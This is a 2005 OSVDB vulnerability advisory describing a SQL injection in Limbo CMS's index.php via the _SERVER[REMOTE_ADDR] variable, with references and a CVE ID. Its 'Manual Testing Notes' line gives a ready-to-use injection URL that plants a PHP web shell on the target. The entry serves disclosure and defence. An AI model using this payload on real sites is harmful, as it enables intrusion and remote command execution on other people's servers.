Limbo CMS index.php _SERVER[REMOTE_ADDR] Variable SQL Injection

2005-12-14T15:03:21
ID OSVDB:21753
Type osvdb
Reporter rgod(retrogod@aliceposta.it)
Modified 2005-12-14T15:03:21

Description

Vulnerability Description

Limbo CMS contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'index.php' script not properly sanitizing user-supplied input to the '_SERVER[REMOTE_ADDR]' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

Limbo CMS contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'index.php' script not properly sanitizing user-supplied input to the '_SERVER[REMOTE_ADDR]' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.

Manual Testing Notes

http://[target]/[path]/index.php?_SERVER[]&_SERVER[REMOTE_ADDR]=999'UNION%20SELECT%20null,'<?php%20system($_G','ET[cmd]);?>'%20INTO%20DUMPFILE%20'[full_application_path]shell.php'%20FROM%20lm_simple_stats/&option=weblinks&Itemid=999/

References:

Vendor URL: http://www.limbo-cms.com/ Security Tracker: 1015364 Secunia Advisory ID:18063 Related OSVDB ID: 21756 Related OSVDB ID: 21755 Related OSVDB ID: 21757 Related OSVDB ID: 21758 Related OSVDB ID: 21759 Related OSVDB ID: 21754 Other Advisory URL: http://rgod.altervista.org/limbo1042_xpl.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-12/0143.html FrSIRT Advisory: ADV-2005-2932 CVE-2005-4318 Bugtraq ID: 15871